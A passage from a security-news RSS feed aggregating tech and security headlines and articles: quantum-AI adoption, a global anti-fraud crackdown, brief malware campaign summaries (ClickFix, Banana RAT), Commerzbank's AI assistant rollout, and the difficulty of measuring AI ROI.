<guid isPermaLink="true">https://tsecurity.de/de/3657471/hacking/ceo-fraud-millionen-verloren-youtube/</guid>
<pubDate>Thu, 09 Jul 2026 17:08:24 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Go to channel <b>Hacking</b> Modern Life · The Flipper One is Finally Here (And It's Huge). <b>Hacking</b> Modern Life•722K views · 12:12.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI tie-in accelerates quantum usefulness, early adopters say]]></title>
<description><![CDATA[Quantum computers are still two to five years away from full-scale production, but early users like the Cleveland Clinic and Mitsubishi Chemical are already seeing benefits, particularly when quantum is used in conjunction with AI and high-performance computing.



“We are starting to see real ap...]]></description>
<link>https://tsecurity.de/de/3657220/it-security-nachrichten/ai-tie-in-accelerates-quantum-usefulness-early-adopters-say/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657220/it-security-nachrichten/ai-tie-in-accelerates-quantum-usefulness-early-adopters-say/</guid>
<pubDate>Thu, 09 Jul 2026 15:38:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.networkworld.com/article/4117438/quantum-computing-is-getting-closer-but-quantum-proof-encryption-remains-elusive.html" target="_blank">Quantum computers</a> are still two to five years away from full-scale production, but early users like the Cleveland Clinic and Mitsubishi Chemical are already seeing benefits, particularly when quantum is used in conjunction with AI and high-performance computing.</p>



<p>“We are starting to see real applications of it,” says <a href="https://www.linkedin.com/in/lara-jehi-md-mhcds-67278a45/" target="_blank" rel="noreferrer noopener">Lara Jehi</a>, chief research information officer at Cleveland Clinic, and one of the keynote speakers at the <a href="https://www.alphaevents.com/events-quantumtechus/faq" target="_blank" rel="noreferrer noopener">Quantum Tech World conference in Boston</a> in late June.</p>



<p>And the technology is moving faster than anyone could have predicted, she tells <em>Network World</em>. For example, in the fall of 2024, the largest simulation that <a href="https://www.networkworld.com/article/4115513/what-enterprises-think-about-quantum-computing.html">quantum computers</a> could handle was just ten atoms, she says. “Roadmaps in the industry were hypothesizing that getting past the 10,000-atom threshold would take another five to seven years.”</p>



<p>This year, the Cleveland Clinic simulated protein complexes of <a href="https://newsroom.clevelandclinic.org/2026/05/05/cleveland-clinic-riken-and-ibm-model-a-12635-atom-protein--the-largest-known-to-be-simulated-with-quantum-computers" target="_blank" rel="noreferrer noopener">up to 12,635 atoms</a>. “We would not have been able to do the same analysis classically,” she says.</p>



<p>But even a protein of this size is still too small to be clinically relevant, she adds. For something with real-world applications, you’d need to be in the ballpark of a million atoms. And that’s not out of reach. “I think we’re very close, I’m very confident,” she says. “One or two years.”</p>



<p>And even today, by <a href="https://www.networkworld.com/article/4144645/ibm-proposes-unified-architecture-for-hybrid-quantum-classical-computing.html" target="_blank">combining quantum computing with AI running on classical computers</a>, it’s possible to do interesting work. For example, simulating how well a compound will bind to a protein in real time is too big a problem for either AI or a quantum computer to handle on its own.</p>



<p>“But AI can do a good job identifying where in that large molecule are the particular spots where you need that extra layer of accuracy,” she says. “We use classical computing up front to identify these highest tier fragments and then zoom in to those fragments with the higher resolution that quantum can provide for better simulation.”</p>



<p>Mitsubishi Chemical has been experimenting with quantum computing since 2018, for quantum chemical calculations and optimization problems, and the technology works.</p>



<p>“We want to try to have it in production use by the end of this year, or maybe the beginning of next year,” says Qi Gao, distinguished scientist in the materials design laboratory of the <a href="https://www.linkedin.com/company/mitsubishi-chemical-america/posts/" target="_blank" rel="noreferrer noopener">Mitsubishi Chemical Corporation</a> Science and Innovation Center. The first use cases will be in advanced semiconductor materials, helping design new materials for computer chips.</p>



<p>“Two-nanometer chips require high energy resolution, which is impossible for classical computer simulations,” he says. “So, we have to use quantum computers.”</p>



<p>The plan is to simulate metal oxide, which is a photo-resistant material used in etching patterns into computer chips. This is a simulation that cannot be done classically, Gao says. It will take a couple of years to fully develop the algorithms to make it work, he says, but the industry is moving towards practical business use.</p>



<p>“Every company is looking at 2028, 2029, or 2030,” he says. “We think 2028 and 2029 will be very important years in quantum computing.”</p>



<p><a href="https://www.softbank.jp/en/" target="_blank" rel="noreferrer noopener">SoftBank Corp.</a> is looking at a similar timeframe for commercializing its quantum computing offerings. The company connects customers to IBM and <a href="https://www.quantinuum.com/" target="_blank" rel="noreferrer noopener">Quantinuum</a> machines at Riken through its AI data center, with 21 pilot projects now ongoing with pilot customers.</p>



<p>“Within our AI data center, we have already built the supercomputer level,” says <a href="https://www.linkedin.com/in/nobushige-oguri-2949525/" target="_blank" rel="noreferrer noopener">Nobushige Oguri</a>, director of the quantum business planning department of the quantum technology divisions at SoftBank Corp. “It’s a world-class supercomputer, but it’s just set up for processing AI. The quantum computer will be the new accelerator to enhance current AI capability.”</p>



<p>It’s this <a href="https://www.networkworld.com/article/4131660/ibm-research-when-ai-and-quantum-merge.html" target="_blank">hybrid use</a> of AI and quantum together that will accelerate adoption, he tells <em>Network World</em>. <a href="https://www.linkedin.com/in/juliette-peyronnet05/" target="_blank" rel="noreferrer noopener">Juliette Peyronnet</a>, U.S. general manager at <a href="https://alice-bob.com/" target="_blank" rel="noreferrer noopener">Alice &amp; Bob</a>, agrees that the hybrid approach is the best bet, with quantum computers augmenting today’s technology, not replacing it.</p>



<p>“Quantum processing units are very specialized devices,” she says. “They can’t solve your everyday problems. They’re really bad at doing basic math.”</p>



<p>Instead, just like the way that CPUs do the bulk of computing work and GPUs are used for AI-related tasks, quantum processors will be used to handle the challenges that traditional computers can’t tackle.</p>



<p>“We know that quantum computers are not going to work in isolation,” she says.</p>



<h2 class="wp-block-heading">A maturing ecosystem</h2>



<p>Another sign that quantum computing is starting to move out of the laboratory and into real-world use is the emergence of a quantum ecosystem, with multiple hardware and software providers filling in all the gaps.</p>



<p>“I’ve been 15 years in field, as a researcher and now as a CEO, and it’s been changing dramatically and accelerating very fast,” says <a href="https://www.linkedin.com/in/mpestarellas/" target="_blank" rel="noreferrer noopener">Marta Estarellas</a>, CEO at <a href="https://qilimanjaro.tech/" target="_blank" rel="noreferrer noopener">Qilimanjaro Quantum Tech</a>, a quantum computing company based in Spain that makes superconducting qubits. And, today, quantum computing companies no longer need to make every single component from scratch, she says.</p>



<p>“Now what you see are a lot of spinoffs and startups starting to build different layers of the supply chain,” she tells <em>Network World</em>. “Which is great. Players like ours don’t have to think about building the full stack and can delegate to third parties—and that really helps push forward the technology.”</p>



<p>The <a href="https://iqnhub.org/event/quantum-tech-2026/" target="_blank" rel="noreferrer noopener">Quantum Tech World conference</a> showcases this ecosystem, she says. According to conference organizers, more than 1,300 people attended this year, and there were more than one hundred sponsors. Among them were multiple quantum computer makers, including <a href="https://quantumcomputinginc.com/" target="_blank" rel="noreferrer noopener">Quantum Computing Inc.,</a> a maker of room-temperature photonic computers, which ran a real-time demo of a fraud detection algorithm that beat the best classical method and scales linearly with data set size instead of quadratically. There were also software companies, consulting firms, and other specialized providers.</p>



<p>“Our booth has been packed,” says <a href="https://www.linkedin.com/in/jason-silbergleit/" target="_blank" rel="noreferrer noopener">Jason Silbergleit</a>, head of Americas at <a href="https://www.classiq.io/" target="_blank" rel="noreferrer noopener">Classiq</a>, an orchestration software company that provides an abstraction layer that makes it easier for non-scientists to build quantum applications. “More and more users want to take advantage of the platform. Even in the past six months—three months—the amount of acceleration and interest is growing.”</p>



<p>“We’re shifting from very fundamental and exploratory, building one-off kinds of systems and devices, to making things that are scalable,” says <a href="https://quantumconsortium.org/speakers/celia-merzbacher/" target="_blank" rel="noreferrer noopener">Celia Merzbacher</a>, executive director at the <a href="https://quantumconsortium.org/speakers/celia-merzbacher/" target="_blank" rel="noreferrer noopener">Quantum Economic Development Consortium</a>. “And within a timeframe that private investors and end users are willing to start to engage.”</p>



<p>The momentum is apparent on a number of fronts, she tells <em>Network World</em>. Quantum companies are getting new rounds of investment, and governments are making commitments. </p>



<p>According to a <a href="https://quantumconsortium.org/publication/2026-state-of-the-global-quantum-industry-report/" target="_blank" rel="noreferrer noopener">report</a> her organization released in April, there are now 556 pure-play quantum companies and more than 7,000 “quantum-engaged” organizations. The quantum industry saw $1.9 billion in revenues in 2025, up 30% from the year before. There was also $12.7 billion in new government funding commitments last year, up more than 300% from 2024, and $4.9 billion in new private venture capital investment, an increase of nearly 200%.</p>



<p>“And the number of people who are really rolling up their sleeves and doing the work that needs to be done to advance the hardware and the software—I think there’s just a momentum that is quite visible,” she says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5,811 arrests, $293 million seized over social engineering scams]]></title>
<description><![CDATA[Criminals who pose as police officers, romantic partners, and business suppliers have built fraud operations that reach across continents. A four-month enforcement campaign against these schemes wrapped up, and police in 97 countries and territories took part. Thousands of arrests…
Read more →
Th...]]></description>
<link>https://tsecurity.de/de/3657043/it-security-nachrichten/5811-arrests-293-million-seized-over-social-engineering-scams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657043/it-security-nachrichten/5811-arrests-293-million-seized-over-social-engineering-scams/</guid>
<pubDate>Thu, 09 Jul 2026 14:38:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Criminals who pose as police officers, romantic partners, and business suppliers have built fraud operations that reach across continents. A four-month enforcement campaign against these schemes wrapped up, and police in 97 countries and territories took part. Thousands of arrests…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/5811-arrests-293-million-seized-over-social-engineering-scams/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/5811-arrests-293-million-seized-over-social-engineering-scams/">5,811 arrests, $293 million seized over social engineering scams</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dealing with Web Security When Using Online Dating Websites]]></title>
<description><![CDATA[In this post, I will discuss dealing with web security when using online dating websites. The main threat on a dating site is rarely the awkward date. It is the account takeover, the phishing link, and the stranger who asks for money before asking to meet. Online romance fraud cost Americans $823...]]></description>
<link>https://tsecurity.de/de/3656825/it-security-nachrichten/dealing-with-web-security-when-using-online-dating-websites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656825/it-security-nachrichten/dealing-with-web-security-when-using-online-dating-websites/</guid>
<pubDate>Thu, 09 Jul 2026 13:22:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this post, I will discuss dealing with web security when using online dating websites. The main threat on a dating site is rarely the awkward date. It is the account takeover, the phishing link, and the stranger who asks for money before asking to meet. Online romance fraud cost Americans $823 million in 2024, […]</p>
<p>The post <a href="https://secureblitz.com/web-security-when-using-online-dating-websites/">Dealing with Web Security When Using Online Dating Websites</a> appeared first on <a href="https://secureblitz.com/">SecureBlitz Cybersecurity</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[5,811 arrests, $293 million seized over social engineering scams]]></title>
<description><![CDATA[Criminals who pose as police officers, romantic partners, and business suppliers have built fraud operations that reach across continents. A four-month enforcement campaign against these schemes wrapped up, and police in 97 countries and territories took part. Thousands of arrests The campaign, c...]]></description>
<link>https://tsecurity.de/de/3656824/it-security-nachrichten/5811-arrests-293-million-seized-over-social-engineering-scams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656824/it-security-nachrichten/5811-arrests-293-million-seized-over-social-engineering-scams/</guid>
<pubDate>Thu, 09 Jul 2026 13:22:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Criminals who pose as police officers, romantic partners, and business suppliers have built fraud operations that reach across continents. A four-month enforcement campaign against these schemes wrapped up, and police in 97 countries and territories took part. Thousands of arrests The campaign, called Operation First Light 2026, centered on social engineering scams and the money laundering that moves their proceeds. Arrests reached 5,811. Investigators intercepted $293 million in illicit assets. Blocking those funds relied in … <a href="https://www.helpnetsecurity.com/2026/07/09/interpol-fraud-bust-social-engineering-scams/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/09/interpol-fraud-bust-social-engineering-scams/">5,811 arrests, $293 million seized over social engineering scams</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Police arrests 5,800 suspects in global anti-fraud crackdown]]></title>
<description><![CDATA[Law enforcement agencies have arrested 5,811 suspects and seized $293 million in illicit assets in a global anti-fraud operation spanning 97 countries. [...]]]></description>
<link>https://tsecurity.de/de/3656556/it-security-nachrichten/police-arrests-5800-suspects-in-global-anti-fraud-crackdown/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656556/it-security-nachrichten/police-arrests-5800-suspects-in-global-anti-fraud-crackdown/</guid>
<pubDate>Thu, 09 Jul 2026 11:52:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Law enforcement agencies have arrested 5,811 suspects and seized $293 million in illicit assets in a global anti-fraud operation spanning 97 countries. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Singapore Mansion Seized Amid Nvidia Chip Smuggling Probe]]></title>
<description><![CDATA[Singapore police charge man with using proceeds from Nvidia server fraud conspiracy to buy luxury home in upscale area This article has been indexed from Silicon UK Read the original article: Singapore Mansion Seized Amid Nvidia Chip Smuggling Probe
Read more →
The post Singapore Mansion Seized A...]]></description>
<link>https://tsecurity.de/de/3656122/it-security-nachrichten/singapore-mansion-seized-amid-nvidia-chip-smuggling-probe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656122/it-security-nachrichten/singapore-mansion-seized-amid-nvidia-chip-smuggling-probe/</guid>
<pubDate>Thu, 09 Jul 2026 08:22:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Singapore police charge man with using proceeds from Nvidia server fraud conspiracy to buy luxury home in upscale area This article has been indexed from Silicon UK Read the original article: Singapore Mansion Seized Amid Nvidia Chip Smuggling Probe</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/singapore-mansion-seized-amid-nvidia-chip-smuggling-probe/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/singapore-mansion-seized-amid-nvidia-chip-smuggling-probe/">Singapore Mansion Seized Amid Nvidia Chip Smuggling Probe</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Messaging fraud trends point to smarter attacks, stronger blocking]]></title>
<description><![CDATA[Fraudsters spent 2025 investing in scale. New routes, new tools, and higher message volumes moved through the SMS, voice, and chat channels that businesses rely on to reach customers. Money follows that activity. The Communications Fraud Control Association puts global…
Read more →
The post Messa...]]></description>
<link>https://tsecurity.de/de/3655989/it-security-nachrichten/messaging-fraud-trends-point-to-smarter-attacks-stronger-blocking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655989/it-security-nachrichten/messaging-fraud-trends-point-to-smarter-attacks-stronger-blocking/</guid>
<pubDate>Thu, 09 Jul 2026 07:07:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fraudsters spent 2025 investing in scale. New routes, new tools, and higher message volumes moved through the SMS, voice, and chat channels that businesses rely on to reach customers. Money follows that activity. The Communications Fraud Control Association puts global…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/messaging-fraud-trends-point-to-smarter-attacks-stronger-blocking/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/messaging-fraud-trends-point-to-smarter-attacks-stronger-blocking/">Messaging fraud trends point to smarter attacks, stronger blocking</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Messaging fraud trends point to smarter attacks, stronger blocking]]></title>
<description><![CDATA[Fraudsters spent 2025 investing in scale. New routes, new tools, and higher message volumes moved through the SMS, voice, and chat channels that businesses rely on to reach customers. Money follows that activity. The Communications Fraud Control Association puts global telecom fraud losses at aro...]]></description>
<link>https://tsecurity.de/de/3655946/it-security-nachrichten/messaging-fraud-trends-point-to-smarter-attacks-stronger-blocking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655946/it-security-nachrichten/messaging-fraud-trends-point-to-smarter-attacks-stronger-blocking/</guid>
<pubDate>Thu, 09 Jul 2026 06:38:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fraudsters spent 2025 investing in scale. New routes, new tools, and higher message volumes moved through the SMS, voice, and chat channels that businesses rely on to reach customers. Money follows that activity. The Communications Fraud Control Association puts global telecom fraud losses at around 42 billion dollars for the year, several billion higher than its estimate for the prior year. Blocked volumes rose alongside the threat. Infobip, a communications platform that handles billions of … <a href="https://www.helpnetsecurity.com/2026/07/09/infobip-messaging-fraud-trends/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/09/infobip-messaging-fraud-trends/">Messaging fraud trends point to smarter attacks, stronger blocking</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix Campaign Uses Fake Google Verification Page to Infect Mexican Bank Customers]]></title>
<description><![CDATA[A fake Google verification page is being used to infect customers of Mexican banks with a malware toolkit built for fraud, not just espionage. The campaign relies on a familiar ClickFix trick, where a victim is pushed to copy and…
Read more →
The post ClickFix Campaign Uses Fake Google Verificati...]]></description>
<link>https://tsecurity.de/de/3655536/it-security-nachrichten/clickfix-campaign-uses-fake-google-verification-page-to-infect-mexican-bank-customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655536/it-security-nachrichten/clickfix-campaign-uses-fake-google-verification-page-to-infect-mexican-bank-customers/</guid>
<pubDate>Thu, 09 Jul 2026 00:23:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fake Google verification page is being used to infect customers of Mexican banks with a malware toolkit built for fraud, not just espionage. The campaign relies on a familiar ClickFix trick, where a victim is pushed to copy and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/clickfix-campaign-uses-fake-google-verification-page-to-infect-mexican-bank-customers/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/clickfix-campaign-uses-fake-google-verification-page-to-infect-mexican-bank-customers/">ClickFix Campaign Uses Fake Google Verification Page to Infect Mexican Bank Customers</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix Campaign Uses Fake Google Verification Page to Infect Mexican Bank Customers]]></title>
<description><![CDATA[A fake Google verification page is being used to infect customers of Mexican banks with a malware toolkit built for fraud, not just espionage. The campaign relies on a familiar ClickFix trick, where a victim is pushed to copy and run a command that quietly starts the infection chain. From there, ...]]></description>
<link>https://tsecurity.de/de/3655501/it-security-nachrichten/clickfix-campaign-uses-fake-google-verification-page-to-infect-mexican-bank-customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655501/it-security-nachrichten/clickfix-campaign-uses-fake-google-verification-page-to-infect-mexican-bank-customers/</guid>
<pubDate>Wed, 08 Jul 2026 23:37:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fake Google verification page is being used to infect customers of Mexican banks with a malware toolkit built for fraud, not just espionage. The campaign relies on a familiar ClickFix trick, where a victim is pushed to copy and run a command that quietly starts the infection chain. From there, the attackers can watch […]</p>
<p>The post <a href="https://cybersecuritynews.com/clickfix-campaign-uses-fake-google-verification-page/">ClickFix Campaign Uses Fake Google Verification Page to Infect Mexican Bank Customers</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Banana RAT Uses Exposed Payload Generator to Create Polymorphic Banking Malware Variants]]></title>
<description><![CDATA[Banking malware just got a serious upgrade in how it hides itself from security teams. A campaign built around Banana RAT, a remote access trojan long tied to Brazilian banking fraud, has been caught using an exposed backend server that builds new malware variants on demand. That server did not j...]]></description>
<link>https://tsecurity.de/de/3654671/it-security-nachrichten/banana-rat-uses-exposed-payload-generator-to-create-polymorphic-banking-malware-variants/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654671/it-security-nachrichten/banana-rat-uses-exposed-payload-generator-to-create-polymorphic-banking-malware-variants/</guid>
<pubDate>Wed, 08 Jul 2026 16:51:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Banking malware just got a serious upgrade in how it hides itself from security teams. A campaign built around Banana RAT, a remote access trojan long tied to Brazilian banking fraud, has been caught using an exposed backend server that builds new malware variants on demand. That server did not just host malicious files, it […]</p>
<p>The post <a href="https://cybersecuritynews.com/banana-rat-uses-exposed-payload-generator/">Banana RAT Uses Exposed Payload Generator to Create Polymorphic Banking Malware Variants</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Commerzbank gibt mit Microsoft und Google bei KI-Rollout Gas]]></title>
<description><![CDATA[Beim KI-Rollout an die Breite der Belegschaft setzt die Commerzbank auf Microsoft 365 Copilot sowie Gemini Enterprise.Commerzbank AG



KI-Pilotprojekte gibt es in deutschen Unternehmen viele. Doch wenn es zum Schwur kommt, trennt sich die Spreu vom Weizen: Sehr viele scheitern, wenn der Rollout ...]]></description>
<link>https://tsecurity.de/de/3654186/it-security-nachrichten/commerzbank-gibt-mit-microsoft-und-google-bei-ki-rollout-gas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654186/it-security-nachrichten/commerzbank-gibt-mit-microsoft-und-google-bei-ki-rollout-gas/</guid>
<pubDate>Wed, 08 Jul 2026 13:54:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Commerzbank_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Finance" class="wp-image-4168860" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Beim KI-Rollout an die Breite der Belegschaft setzt die Commerzbank auf Microsoft 365 Copilot sowie Gemini Enterprise.</figcaption></figure><p class="imageCredit">Commerzbank AG</p></div>



<p>KI-Pilotprojekte gibt es in deutschen Unternehmen viele. Doch wenn es zum Schwur kommt, trennt sich die Spreu vom Weizen: Sehr viele scheitern, wenn der Rollout an die breite Masse der Belegschaft ansteht.</p>



<p>Ein Unternehmen, das jetzt den Schritt angeht, KI direkt und in der Breite in den Arbeitsalltag ihrer Mitarbeiter zu integrieren ist die Commerzbank. Im Gegensatz zum Autobauer Mercedes-Benz, der dabei auf eine Partnerschaft mit dem <a href="https://www.handelsblatt.com/technik/ki/ki-start-up-berliner-ki-spezialist-n8n-steigt-zum-einhorn-auf/100144863.html">Berliner Unicorn n8n</a> setzt, verlässt man sich bei der Bank auf die US-amerikanischen Hyperscaler Microsoft und Google.</p>



<h2 class="wp-block-heading">Copilot und Gemini als KI-Assis</h2>



<p>So weitet das Geldhaus seine Partnerschaften mit den beiden Konzernen aus, um KI-Assistenten <a href="https://www.computerwoche.de/article/4124939/microsoft-brustet-sich-mit-m365-copilot-momentum.html?utm=hybrid_search">Microsoft 365 Copilot</a> sowie <a href="https://www.computerwoche.de/article/2832441/google-verzahnt-gemini-mit-business-apps.html?utm=hybrid_search">Gemini Enterprise</a> einzuführen. Zielgruppe sind nicht hochspezialisierte Daten-Teams, sondern klassische Sachbearbeiter und Manager.</p>



<p>Die Bank will so die Grundlage für effizientere Abläufe und ein modernes Arbeitsumfeld schaffen. So sollen Nutzungshürden gesenkt und der produktive Einsatz künstlicher Intelligenz im gesamten Konzern erleichtert werden.</p>



<h2 class="wp-block-heading">600 Millionen Invest für KI</h2>



<p>Der Rollout erfolgt im Rahmen der Strategie „<a href="https://www.commerzbank.de/konzern/newsroom/pressemitteilungen/commerzbank-liefert-starkes-erstes-quartal.html">Momentum 2030</a>“ mit der die Bank die Potenziale von KI noch stärker ausschöpfen will. Im Zeitraum von 2026 bis 2030 plant sie kumuliert rund 600 Millionen Euro in diesem Bereich investieren. Ab 2030 erwartet die Commerzbank aus ihren KI-Initiativen einen Wertbeitrag von rund 500 Millionen Euro pro Jahr.</p>



<p>Dabei ist das Thema KI für die Bank kein Neuland. So hat die Bank bereits 2017 – lange vor dem aktuellen KI-Hype – einen eigenen Bereich für <a href="https://www.computerwoche.de/article/2716791/was-ist-was-bei-predictive-analytics.html?utm=hybrid_search">Big Data</a> und <a href="https://www.cio.de/article/3697392/wie-sich-unternehmen-krisensicher-aufstellen.html?utm=hybrid_search">Advanced Analytics</a> ins Leben gerufen. Im Zuge der <a href="https://www.cio.de/article/4168849/die-ki-strategie-der-commerzbank.html?utm=hybrid_search">KI-Strategie des Instituts</a> wurden dann Projekte wie der virtuelle <a href="https://www.commerzbank.de/service/grundlegendes-zum-avatar/">Avatar Ava</a>, das Assistenzsystem Sherlock oder <a href="https://www.commerzbank.de/group/newsroom/press-releases/2025/20250509-pr-q1-2025.pdf">Fraud AI</a> realisiert. Ebenso wurde eine eigene AI Academy gegründet, um Mitarbeiter zu schulen.  </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why is it so hard to measure the ROI of AI?]]></title>
<description><![CDATA[Danish multinational pharmaceutical Novo Nordisk is very interested in speeding up the time it takes to get drugs to market as patents expire. “If you have a blockbuster drug, a one-week delay can be $10 to $100 million,” says Stephanie Bova, the company’s digital transformation officer. “It’s ma...]]></description>
<link>https://tsecurity.de/de/3653926/it-security-nachrichten/why-is-it-so-hard-to-measure-the-roi-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653926/it-security-nachrichten/why-is-it-so-hard-to-measure-the-roi-of-ai/</guid>
<pubDate>Wed, 08 Jul 2026 12:08:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Danish multinational pharmaceutical Novo Nordisk is very interested in speeding up the time it takes to get drugs to market as patents expire. “If you have a blockbuster drug, a one-week delay can be $10 to $100 million,” says Stephanie Bova, the company’s digital transformation officer. “It’s massive money because you have less time on patent.”</p>



<p>Gen AI offered the possibility of dramatically speeding up multiple steps in the drug development process. And since Novo Nordisk was already carefully tracking how long its key processes took, it had an advantage that many companies didn’t. So it should’ve been relatively simple to sprinkle in some gen AI, see productivity improve, and watch the money roll in. But it wasn’t that easy. A drug development process has many parts, happening at different times in different departments.</p>



<p>“People are experts in their own domains but don’t necessarily know the next domain and how it all fits together,” Bova says. “The system is so big and complex that you’re not able to see all the performance at once.”</p>



<p>Process documentation might not match what people actually do in practice, and different people might do the same task in different ways. And some crucial tasks might be nearly invisible from the outside. The manufacturing team, for example, might sit in a completely different group and not be aware the drug is getting ready for FDA submission, and don’t have all their documents ready yet.</p>



<p>“So you’ve run very fast only to have to wait for them to catch up,” Bova adds.</p>



<p>This is just one of many challenges companies face when trying to measure the results of AI projects, and why surveys are so contradictory.</p>



<p>Looking at individual tasks, Novo Nordisk can show productivity improvements and clear positive benefits to its use of AI. But stepping back and looking at the company’s bottom line, the picture gets murkier. First, if critical steps are missed, then time to market won’t improve. It also takes years for a new drug to get to customers, so any positive bottom-line effects won’t be felt for a while. And that’s just the start of the <a href="https://www.cio.com/article/4159823/ai-doesnt-create-roi-organizations-do.html?utm=hybrid_search">ROI measurement problem</a>.</p>



<h2 class="wp-block-heading">Process measurement</h2>



<p>To address its process blind spots, Novo Nordisk turned to the new generation of process mining: AI-powered real-time digital twins of operations.</p>



<p>“We partnered with process intelligence company Celonis to get a digital twin of our process data,” Bova says. “We were the first in the industry to apply it to the clinical setting.” The tool collects information from enterprise systems to track what employees actually do, rather than using surveys to collect information on what a fraction of employees remembered doing at some point.</p>



<p>The first project was a simple, seven-step process, and in creating a digital twin of it, Novo Nordisk discovered that, depending on who was doing it, it could be a five- or nine-step process. “If you get 10 different subject matter experts in a room, you get all kinds of interpretations, and you have drift over time,” she says.</p>



<p>The project exposed multiple flaws in existing processes. In some cases, employees needed to be retrained. In one, the user interface had to be updated. Once a process is standardized, though, there’s an opportunity to take the before picture, so there’s something to compare to afterward, to see if the AI augmentation or automation show any results.</p>



<p>Another thing they had to figure out ahead of time was decide what to do with any time savings that showed up.</p>



